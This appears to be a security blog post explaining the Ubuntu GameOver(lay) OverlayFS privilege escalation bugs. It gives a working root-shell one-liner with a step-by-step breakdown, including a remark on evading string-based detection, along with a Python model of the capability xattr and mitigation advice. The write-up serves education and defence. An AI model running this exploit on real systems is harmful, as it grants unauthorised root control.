Ubuntu GameOver(lay) Local Privilege Escalation CVE-2023-32629 and CVE-2023-2640

0xRave
4 min read · Oct 31, 2023

The vulnerabilities CVE-2023-32629 and CVE-2023-2640, known together as GameOver(lay), were both found in the Ubuntu-specific changes to the Linux kernel's OverlayFS module. This post gives a simple POC to check whether your Ubuntu system is vulnerable and explains how to fix it.

CVE-2023-2640

On affected Ubuntu kernels, OverlayFS lets an unprivileged user set privileged extended attributes (such as security.capability) on files in a mounted overlay. When those files are copied up, the attributes are written to the upper-layer files without the security checks the kernel would normally apply to a privileged xattr. Since the upper files are ordinary files on the host, an attacker can end up with a file whose privileged attributes the host honours, which is what makes the privilege escalation below possible.

Reference:

https://nvd.nist.gov/vuln/detail/CVE-2023-2640

CVE-2023-32629

This is a local privilege escalation vulnerability in which Ubuntu kernels skip permission checks when performing certain OverlayFS operations. Specifically, the OverlayFS function ovl_copy_up_meta_inode_data calls ovl_do_setxattr without the permission checks that apply to a normal setxattr, so extended attributes on a lower-layer file are reproduced on the upper-layer file unchecked during copy-up.

Reference:

https://www.tenable.com/cve/CVE-2023-32629

https://access.redhat.com/security/cve/CVE-2023-32629

Impact

Both vulnerabilities enable a local privilege escalation, where an unprivileged user can gain elevated privileges on the system. This is a serious issue as it allows attackers with basic access to escalate their privileges to a root level, gaining full control over the affected system.

POC

Payload

First, check whether the Ubuntu system supports OverlayFS or is already using it:

# Check if the module is loaded
lsmod | grep overlay
# Check if the module is available
modinfo overlay
# Check whether any overlay filesystem is currently mounted
mount | grep overlay
Screenshot captured from the HTB Analytics machine, running Ubuntu 22.04.2.
# Run this payload as an unprivileged user; you may replace /bin/bash with another command.
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
Privilege escalation successful: the resulting shell runs as root.

Payload Explanation

unshare -rm

  • unshare runs a program in new namespaces. A namespace is a Linux kernel feature that partitions kernel resources so that one set of processes sees one set of resources while another set sees a different, isolated set.
  • The -r option creates a new user namespace and maps the current (unprivileged) user to root inside it. This only works when unprivileged user namespaces are enabled, which is the Ubuntu default; being "root" in the namespace grants no privilege on the host by itself.
  • The -m option creates a new mount namespace, so any mounts made inside it are not visible to processes outside it.

sh -c “mkdir l u w m && cp /u*/b*/p*3 l/;

  • This invokes a new shell, sh, to execute the command string given after -c inside the new namespaces.
  • mkdir l u w m creates four directories named l, u, w, and m (lower, upper, work and merged/mount point).
  • cp /u*/b*/p*3 l/ copies the host's Python 3 interpreter into the lower directory l. The glob expands to /usr/bin/python3 (and any other /usr/bin binary whose name starts with p and ends with 3); the abbreviated path keeps the one-liner short and harder to match with simple string-based detections.

setcap cap_setuid+eip l/python3;

  • setcap sets file capabilities on a binary, stored in its security.capability extended attribute.
  • cap_setuid allows the binary to change its UID (User Identifier).
  • +eip marks the capability as effective, inheritable, and permitted.
  • This grants the python3 copy in the l directory the ability to change its user ID, effectively allowing it to become any user, including root.
  • Normally this is harmless: the caller is only root inside the user namespace, so the kernel records a namespaced (v3) capability xattr tagged with the namespace's root, i.e. the attacker's real UID. The host's initial user namespace does not honour such a capability. The bug is in how OverlayFS copies that xattr to the upper layer.

mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m

  • This mounts an overlay filesystem from inside the unprivileged user and mount namespaces, which the affected kernels permit. An overlay filesystem stacks one directory (the upper directory) on top of another (the lower directory) and presents the combination at the mount point.
  • Here it overlays u over l, using w as the work directory OverlayFS needs for atomic operations, and mounts the merged view at m. Files changed through m are first copied from l up into u.

touch m/*

  • touch updates the timestamps of every file visible in the merged directory m, which is a metadata write. OverlayFS handles it by copying each lower file, python3 included, up into the upper directory u along with its extended attributes. On vulnerable kernels, ovl_copy_up_meta_inode_data writes the security.capability attribute to the upper file through ovl_do_setxattr without the namespace-aware permission checks, so u/python3 ends up carrying a cap_setuid capability that the host honours.

u/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'

  • Once the sh command sequence completes, unshare exits and the namespaces disappear, but u is an ordinary directory on the host filesystem. The python3 copy in u, together with its capability attribute, is therefore visible to the attacker's normal, unprivileged shell.
  • os.setuid(0) sets the user ID of the current process to 0, the UID of root. Because the Python3 binary now carries a cap_setuid capability that the host's user namespace accepts, the call succeeds instead of failing with a permission error.
  • os.system("/bin/bash") starts a new bash shell. Since the process's user ID was just set to 0, this shell runs with root privileges.
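What the payload relies on is easier to see at the byte level. The following Python is an added example, not code from the original post or from the kernel: it encodes and decodes the security.capability xattr blob that setcap writes (layout of struct vfs_cap_data / vfs_ns_cap_data from linux/capability.h) and models, in deliberately simplified form, how the kernel converts that blob between its namespaced (v3) and plain (v2) forms on read and on write. The function names, the attacker UID of 1000 and the two modelled write paths are assumptions for illustration; the real kernel logic (cap_inode_getsecurity, cap_convert_nscap) handles more cases than shown here.

```python
"""Byte-level model of the security.capability xattr used by GameOver(lay).

Added example, not code from the original post or from the kernel. Blob layout
follows struct vfs_cap_data / vfs_ns_cap_data in linux/capability.h; the
namespace conversion is a simplified model of cap_inode_getsecurity (read side)
and cap_convert_nscap (write side). The attacker uid 1000 is an assumption.
"""
import struct

VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_REVISION_2 = 0x02000000     # 20 bytes, no rootid: valid in the init user namespace
VFS_CAP_REVISION_3 = 0x03000000     # 24 bytes, trailing rootid: valid where rootid is root
VFS_CAP_FLAGS_EFFECTIVE = 0x000001  # the "e" in +eip: permitted caps are also effective
CAP_SETUID = 7                      # bit number from linux/capability.h


def build_cap_xattr(permitted, inheritable=0, effective=True, rootid=None):
    """Encode a security.capability blob; v2 when rootid is None, else v3."""
    magic = VFS_CAP_REVISION_3 if rootid is not None else VFS_CAP_REVISION_2
    if effective:
        magic |= VFS_CAP_FLAGS_EFFECTIVE
    # u32 magic, then two (permitted, inheritable) u32 pairs: low words, high words
    blob = struct.pack("<5I", magic,
                       permitted & 0xFFFFFFFF, inheritable & 0xFFFFFFFF,
                       permitted >> 32, inheritable >> 32)
    if rootid is not None:
        blob += struct.pack("<I", rootid)
    return blob


def parse_cap_xattr(blob):
    """Decode a v2 or v3 security.capability blob into a dict."""
    magic, p_lo, i_lo, p_hi, i_hi = struct.unpack_from("<5I", blob)
    revision = magic & VFS_CAP_REVISION_MASK
    if revision == VFS_CAP_REVISION_2 and len(blob) == 20:
        rootid = 0  # v2 has no rootid field; it means "root of the init namespace"
    elif revision == VFS_CAP_REVISION_3 and len(blob) == 24:
        rootid = struct.unpack_from("<I", blob, 20)[0]
    else:
        raise ValueError("unsupported security.capability revision or size")
    return {
        "revision": revision >> 24,
        "effective": bool(magic & VFS_CAP_FLAGS_EFFECTIVE),
        "permitted": p_lo | (p_hi << 32),
        "inheritable": i_lo | (i_hi << 32),
        "rootid": rootid,
    }


def userns_read(blob, ns_root_uid):
    """Model of getxattr from inside a user namespace whose root is host uid
    ns_root_uid: a v3 blob owned by that namespace is presented as plain v2."""
    cap = parse_cap_xattr(blob)
    if cap["revision"] == 3 and cap["rootid"] == ns_root_uid:
        return build_cap_xattr(cap["permitted"], cap["inheritable"], cap["effective"])
    return blob


def checked_write(blob, ns_root_uid):
    """Model of the normal setxattr path: a v2 blob written from a non-initial
    user namespace is rewritten as v3 with rootid = that namespace's root."""
    cap = parse_cap_xattr(blob)
    if ns_root_uid != 0 and cap["revision"] == 2:
        return build_cap_xattr(cap["permitted"], cap["inheritable"],
                               cap["effective"], rootid=ns_root_uid)
    return blob


def unchecked_write(blob, ns_root_uid):
    """Model of the vulnerable copy-up: the bytes read inside the namespace are
    written to the upper file as-is, with no namespace conversion."""
    return blob


def honoured_on_host(blob):
    """Would the init user namespace grant CAP_SETUID from this blob?
    Only a rootid-0 (v2) blob with the bit both permitted and effective counts."""
    cap = parse_cap_xattr(blob)
    return (cap["rootid"] == 0 and cap["effective"]
            and bool(cap["permitted"] & (1 << CAP_SETUID)))


def simulate_copy_up(attacker_uid, write_path):
    """Walk the payload's xattr through setcap -> overlay copy-up -> upper file."""
    # setcap cap_setuid+eip l/python3 inside the namespace: the kernel stores a
    # v3 blob with rootid = the attacker's real uid, which the host ignores.
    lower_xattr = build_cap_xattr(1 << CAP_SETUID, rootid=attacker_uid)
    # touch m/* triggers copy-up; OverlayFS reads the xattr from inside the
    # namespace and sees it as v2 (it belongs to "root" there).
    as_read = userns_read(lower_xattr, attacker_uid)
    # ...and writes it to u/python3 via the chosen setxattr path.
    return write_path(as_read, attacker_uid)


if __name__ == "__main__":
    for name, path in (("vulnerable kernel", unchecked_write),
                       ("patched kernel", checked_write)):
        upper = simulate_copy_up(1000, path)
        print(f"{name}: upper xattr {upper.hex()} "
              f"-> host honours CAP_SETUID: {honoured_on_host(upper)}")
```

The v2 blob produced for cap_setuid+eip is the 20-byte value 0x0100000280000000000000000000000000000000, which is also what getfattr -n security.capability -e hex shows on a real file after setcap. On a patched kernel the upper file keeps a v3 blob tagged with the attacker's UID and os.setuid(0) fails; on a vulnerable kernel the unconverted v2 blob lands on u/python3 and the host grants the capability.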

Payload reference:

https://www.reddit.com/r/selfhosted/comments/15ecpck/ubuntu_local_privilege_escalation_cve20232640/

https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629/blob/main/exploit.sh

Mitigation

Install the patched Ubuntu kernel published in USN-6250-1 through the normal package update process and reboot so the new kernel is actually running; an updated package does nothing until the reboot. Where patching has to wait, restricting unprivileged user namespaces (the kernel.unprivileged_userns_clone sysctl on Ubuntu) blocks the unshare -r step the payload depends on, at the cost of breaking software that legitimately relies on user namespaces.

Reference:

https://ubuntu.com/security/notices/USN-6250-1

https://thesecmaster.com/how-to-fix-gameoverlay-two-local-privilege-escalation-vulnerabilities-in-ubuntu-linux-kernel/#How_to_Test_the_GameOverlay_Vulnerabilities
